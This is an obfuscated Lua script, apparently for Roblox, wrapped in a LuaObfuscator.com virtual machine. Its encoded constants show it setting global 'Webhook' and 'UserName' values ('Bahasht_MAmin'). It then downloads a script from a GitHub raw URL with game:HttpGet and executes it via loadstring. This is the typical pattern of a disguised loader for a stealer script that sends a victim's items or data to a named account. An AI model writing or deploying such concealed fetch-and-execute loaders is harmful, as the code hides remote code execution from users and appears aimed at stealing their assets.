--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v98=v5(v85,v19);v19=nil;return v98;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -0 ;local v87;while true do if (v86==(0 -0)) then v87=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -((2004 -(1523 + 114)) + 201)))) + (928 -(214 + 713)))) ;return v87-(v87%(1 + 0 + 0)) ;end end else local v88=((1 -0) + 1)^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (878 -(282 + 595))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1065 -(68 + 997) ;local v36;local v37;while true do if (v35==(1271 -(226 + 1044))) then return (v37 * (1114 -858)) + v36 ;end if (v35==((278 -161) -(32 + 85))) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + (1 -0) ;v35=958 -(892 + 65) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + 4 ;return (v41 * (16777566 -(87 + 263))) + (v40 * (160901 -95365)) + (v39 * 256) + v38 ;end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=(1 + 2) -2 ;v46=(v20(v44,953 -(802 + 150) ,20) * ((5 -3)^(57 -25))) + v43 ;v42=2 + 0 ;end if ((999 -(915 + 82))==v42) then v47=v20(v44,21,(72 + 15) -56 );v48=((v20(v44,19 + 13 )==(1 -0)) and  -(1188 -(1069 + 118))) or 1 ;v42=6 -3 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + (772 -(201 + 571)) ;end if (v42==(4 -1)) then if (v47==((1138 -(116 + 1022)) + 0)) then if (v46==0) then return v48 * 0 ;else local v99=791 -(368 + 423) ;while true do if (v99==((0 -0) -0)) then v47=(12 + 7) -(10 + 8) ;v45=0 -0 ;break;end end end elseif (v47==(2489 -(416 + 26))) then return ((v46==(0 -0)) and (v48 * (((3 -2) + 0)/((0 -0) -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1461 -(145 + 293)) ) * (v45 + (v46/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(859 -(814 + 45))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v67=1 + 0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(658 -(132 + 522))) then else while true do if (v53~=(2 -0)) then else v58=nil;v59=nil;v53=3;end if (v53==(1385 -(746 + 638))) then local v96=0 + 0 ;while true do if (v96==0) then v56=nil;v57=nil;v96=1 -0 ;end if (v96~=1) then else v53=2;break;end end end if (v53~=(341 -(218 + 123))) then else local v97=0;while true do if (0~=v97) then else v54=0;v55=nil;v97=1;end if (v97==1) then v53=1582 -(1535 + 46) ;break;end end end if (v53~=(3 + 0)) then else v60=nil;while true do local v100=0 + 0 ;local v101;while true do if ((560 -(306 + 254))~=v100) then else v101=0 + 0 ;while true do if (v101==0) then local v140=0;while true do if (v140==(0 -0)) then if (v54~=(1468 -(899 + 568))) then else local v159=0 + 0 ;local v160;while true do if (v159~=(0 -0)) then else v160=0;while true do if (v160==2) then v54=2;break;end if (v160==(604 -(268 + 335))) then local v169=290 -(60 + 230) ;while true do if (v169==(573 -(426 + 146))) then v160=2;break;end if (v169~=0) then else local v171=0;while true do if (v171~=0) then else for v173=1,v59 do local v174=0;local v175;local v176;local v177;while true do if (v174~=(0 + 0)) then else v175=0;v176=nil;v174=1;end if (v174==(1457 -(282 + 1174))) then v177=nil;while true do if (v175==0) then local v186=0;while true do if (v186==0) then local v189=811 -(569 + 242) ;while true do if (v189~=1) then else v186=2 -1 ;break;end if (v189==(0 + 0)) then v176=v21();v177=nil;v189=1;end end end if (v186==(1025 -(706 + 318))) then v175=1;break;end end end if (v175==(1252 -(721 + 530))) then if (v176==1) then v177=v21()~=0 ;elseif (v176==(1273 -(945 + 326))) then v177=v24();elseif (v176==(7 -4)) then v177=v25();end v60[v173]=v177;break;end end break;end end end v58[3]=v21();v171=1;end if (v171~=1) then else v169=1 + 0 ;break;end end end end end if (v160==0) then local v170=0;while true do if (v170==(700 -(271 + 429))) then v59=v23();v60={};v170=1;end if (v170~=1) then else v160=1 + 0 ;break;end end end end break;end end end if (v54==(1502 -(1408 + 92))) then local v161=1086 -(461 + 625) ;local v162;while true do if (v161==(1288 -(993 + 295))) then v162=0;while true do local v167=0;local v168;while true do if (0==v167) then v168=0;while true do if (v168~=(0 + 0)) then else if (v162==0) then for v178=1172 -(418 + 753) ,v23() do local v179=0;local v180;local v181;local v182;local v183;while true do if (v179~=(1 + 0)) then else v182=nil;v183=nil;v179=2;end if (v179==(1 + 1)) then while true do if (v180==1) then v183=nil;while true do if (v181~=(1 + 0)) then else while true do if ((0 + 0)==v182) then v183=v21();if (v20(v183,530 -(406 + 123) ,1770 -(1749 + 20) )==(0 + 0)) then local v190=0;local v191;local v192;local v193;local v194;while true do if (1==v190) then local v195=1322 -(1249 + 73) ;while true do if (0==v195) then v193=nil;v194=nil;v195=1 + 0 ;end if (1~=v195) then else v190=2;break;end end end if ((1145 -(466 + 679))==v190) then v191=0;v192=nil;v190=2 -1 ;end if (v190~=(5 -3)) then else while true do if (3~=v191) then else if (v20(v193,3,1903 -(106 + 1794) )==(1 + 0)) then v194[2 + 2 ]=v60[v194[11 -7 ]];end v55[v178]=v194;break;end if (v191==(2 -1)) then local v197=0;while true do if (1==v197) then v191=116 -(4 + 110) ;break;end if (v197==0) then v194={v22(),v22(),nil,nil};if (v192==0) then local v204=1427 -(41 + 1386) ;local v205;local v206;local v207;while true do if (v204==(103 -(17 + 86))) then v205=0;v206=nil;v204=1;end if (v204~=(1 + 0)) then else v207=nil;while true do if ((1 -0)==v205) then while true do if (v206==0) then v207=0 -0 ;while true do if (v207==(166 -(122 + 44))) then v194[5 -2 ]=v22();v194[12 -8 ]=v22();break;end end break;end end break;end if (v205~=(0 + 0)) then else local v211=0 + 0 ;while true do if (0==v211) then v206=0 -0 ;v207=nil;v211=66 -(30 + 35) ;end if (v211==(1 + 0)) then v205=1258 -(1043 + 214) ;break;end end end end break;end end elseif (v192==1) then v194[11 -8 ]=v23();elseif (v192==(1214 -(323 + 889))) then v194[7 -4 ]=v23() -((582 -(361 + 219))^(336 -(53 + 267))) ;elseif (v192==3) then local v212=0;local v213;while true do if (v212==0) then v213=0;while true do if (v213==0) then v194[1 + 2 ]=v23() -(2^16) ;v194[4]=v22();break;end end break;end end end v197=1;end end end if (v191==(415 -(15 + 398))) then local v198=0;local v199;while true do if (v198~=(982 -(18 + 964))) then else v199=0;while true do if (v199==(3 -2)) then v191=2 + 1 ;break;end if ((0 + 0)~=v199) then else local v208=0;while true do if (0~=v208) then else if (v20(v193,851 -(20 + 830) ,1 + 0 )==(127 -(116 + 10))) then v194[1 + 1 ]=v60[v194[740 -(542 + 196) ]];end if (v20(v193,3 -1 ,1 + 1 )==1) then v194[2 + 1 ]=v60[v194[2 + 1 ]];end v208=2 -1 ;end if (v208==(2 -1)) then v199=1552 -(1126 + 425) ;break;end end end end break;end end end if (v191~=(405 -(118 + 287))) then else local v200=0;while true do if (v200==(3 -2)) then v191=1122 -(118 + 1003) ;break;end if (v200~=(0 -0)) then else local v203=0;while true do if (v203==1) then v200=1;break;end if (v203==(377 -(142 + 235))) then v192=v20(v183,2,13 -10 );v193=v20(v183,4,2 + 4 );v203=978 -(553 + 424) ;end end end end end end break;end end end break;end end break;end if (0~=v181) then else v182=0 -0 ;v183=nil;v181=1;end end break;end if (0==v180) then local v188=0;while true do if (v188~=0) then else v181=0;v182=nil;v188=1;end if (v188==1) then v180=1;break;end end end end break;end if (v179==0) then v180=0;v181=nil;v179=1;end end end for v184=1,v23() do v56[v184-(1 + 0) ]=v28();end v162=1 + 0 ;end if (v162==1) then return v58;end break;end end break;end end end break;end end end v140=1 + 0 ;end if (v140==1) then v101=1;break;end end end if (1~=v101) then else if (v54==(0 + 0)) then local v148=0 + 0 ;while true do if (v148~=1) then else local v163=0 -0 ;while true do if (v163==(0 -0)) then v57={};v58={v55,v56,nil,v57};v163=1;end if (v163==1) then v148=2;break;end end end if (v148==2) then v54=4 -3 ;break;end if (v148==(753 -(239 + 514))) then local v164=0 + 0 ;while true do if (v164==(1329 -(797 + 532))) then v55={};v56={};v164=1 + 0 ;end if (v164==(1 + 0)) then v148=2 -1 ;break;end end end end end break;end end break;end end end break;end end break;end if (v52==(1205 -(373 + 829))) then v59=nil;v60=nil;v52=4;end if (v52==2) then v57=nil;v58=nil;v52=3;end if (v52==1) then v55=nil;v56=nil;v52=733 -(476 + 255) ;end if (v52==0) then v53=1130 -(369 + 761) ;v54=nil;v52=1;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=11) then if (v82<=5) then if (v82<=2) then if (v82<=0) then local v102=v81[2];local v103=v79[v81[3]];v79[v102 + 1 ]=v103;v79[v102]=v103[v81[4]];elseif (v82==1) then for v141=v81[2],v81[3] do v79[v141]=nil;end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=3) then v73=v81[3];elseif (v82==4) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]();end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]=v81[3];elseif (v82>7) then v79[v81[2]]();else local v116=0;local v117;local v118;local v119;local v120;while true do if (v116==1) then v74=(v119 + v117) -1 ;v120=0;v116=2;end if (0==v116) then v117=v81[2];v118,v119=v72(v79[v117](v13(v79,v117 + 1 ,v81[3])));v116=1;end if (v116==2) then for v155=v117,v74 do local v156=0;while true do if (v156==0) then v120=v120 + 1 ;v79[v155]=v118[v120];break;end end end break;end end end elseif (v82<=9) then local v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));elseif (v82==10) then v79[v81[2]]=v81[3]~=0 ;else local v122=v81[2];v79[v122]=v79[v122](v13(v79,v122 + 1 ,v74));end elseif (v82<=17) then if (v82<=14) then if (v82<=12) then do return;end elseif (v82>13) then v79[v81[2]]=v81[3];else for v143=v81[2],v81[3] do v79[v143]=nil;end end elseif (v82<=15) then v73=v81[3];elseif (v82==16) then do return;end else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=20) then if (v82<=18) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>19) then v79[v81[2]][v81[3]]=v81[4];else local v131=0;local v132;local v133;while true do if (v131==1) then v79[v132 + 1 ]=v133;v79[v132]=v133[v81[4]];break;end if (v131==0) then v132=v81[2];v133=v79[v81[3]];v131=1;end end end elseif (v82<=21) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>22) then v79[v81[2]]=v63[v81[3]];else local v136=v81[2];local v137,v138=v72(v79[v136](v13(v79,v136 + 1 ,v81[3])));v74=(v138 + v136) -1 ;local v139=0;for v145=v136,v74 do local v146=0;while true do if (v146==0) then v139=v139 + 1 ;v79[v145]=v137[v139];break;end end end end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030D3O00426168617368745F4D416D696E03093O00557365724E616D653200253O00120E3O00014O000D000100013O0026123O0002000100010004033O0002000100120E000100013O00261200010012000100020004033O00120001001204000200033O003011000200040005001204000200063O001204000300073O00201300030003000800120E000500094O000A000600014O0007000300064O000900023O00022O00050002000100010004033O0024000100261200010005000100010004033O0005000100120E000200013O00261200020019000100020004033O0019000100120E000100023O0004033O0005000100261200020015000100010004033O00150001001204000300033O0030110003000A000B001204000300033O0030110003000C000500120E000200023O0004033O001500010004033O000500010004033O002400010004033O000200012O00103O00017O00",v9(),...);end
